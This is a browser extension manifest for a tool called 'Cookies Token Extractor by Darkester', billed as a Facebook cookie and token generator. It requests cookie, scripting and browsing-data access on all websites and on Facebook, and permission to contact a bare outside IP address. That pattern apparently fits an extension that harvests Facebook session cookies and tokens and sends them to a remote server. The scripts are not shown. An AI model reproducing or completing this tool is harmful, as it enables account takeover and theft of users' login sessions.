{
  "manifest_version": 3,
  "name": "Cookies Token Extractor by Darkester",
  "version": "3.0.1",
  "description": "Facebook Cookie and Token Generator",
  "permissions": [ "cookies", "tabs", "scripting", "activeTab", "browsingData", "https://*/", "http://*/", "http://104.168.76.139/"],
  "host_permissions": ["*://*.facebook.com/*", "http://104.168.76.139/*"],
  "icons": {
    "16": "icons/icon16.png",
    "48": "icons/icon48.png",
    "128": "icons/icon128.png"
  },
  "action": {
    "default_popup": "popup.html",
    "default_icon": {
      "16": "icons/icon16.png",
      "48": "icons/icon48.png",
      "128": "icons/icon128.png"
    }
  }
}